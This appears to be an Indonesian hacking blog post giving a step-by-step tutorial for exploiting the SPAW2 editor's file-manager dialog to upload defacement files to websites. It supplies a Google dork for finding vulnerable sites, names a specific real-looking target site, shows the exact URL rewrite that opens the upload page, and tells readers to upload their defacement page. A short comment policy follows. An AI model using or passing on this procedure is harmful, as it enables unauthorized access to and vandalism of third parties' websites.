Banyak exploit yang dapat mengupload file secara langsung, ok kali ini kami memberi tutorial sekaligus cara menggunakan exploit itu.
dorknya :
inurl:”spaw2/dialogs/” OR inurl:”spaw2/uploads/files/”
Jika sudah dapat targetny, contoh targetnya :
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf
bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf
GANTI DENGAN
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
MAKA HASILNYA SEPERTI INI
http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
- Akan tampil halaman untuk upload File.
- Ganti menjadi files pada lokasi penyimpanan.
- Browse file design Deface kamu, & upload.
- Apabila file sukses diupload.akan terlihat file uploadtan tadi…
thx to code scurity
No comments:
Post a Comment
Kebijakan berkomentar akan dihapus, jika tidak sesuai dengan aturan dibawah ini, Demi kenyamanan kita bersama :
» Menggunakan bahasa yang tidak sopan (Sara, Pornografi, Menyinggung)
» Duplikat komentar
» Komentar menautkan link secara langsung
» Komentar tidak berkaitan dengan artikel
» Judul Komentar Berupa Promosi
Bila Anda punya nama atau blog gunakan komentar sebagai "Name/ URL".
Sebelumnya vito minta maaf yg sebesar"nya jika komentar anda belum sempat dibales. ^^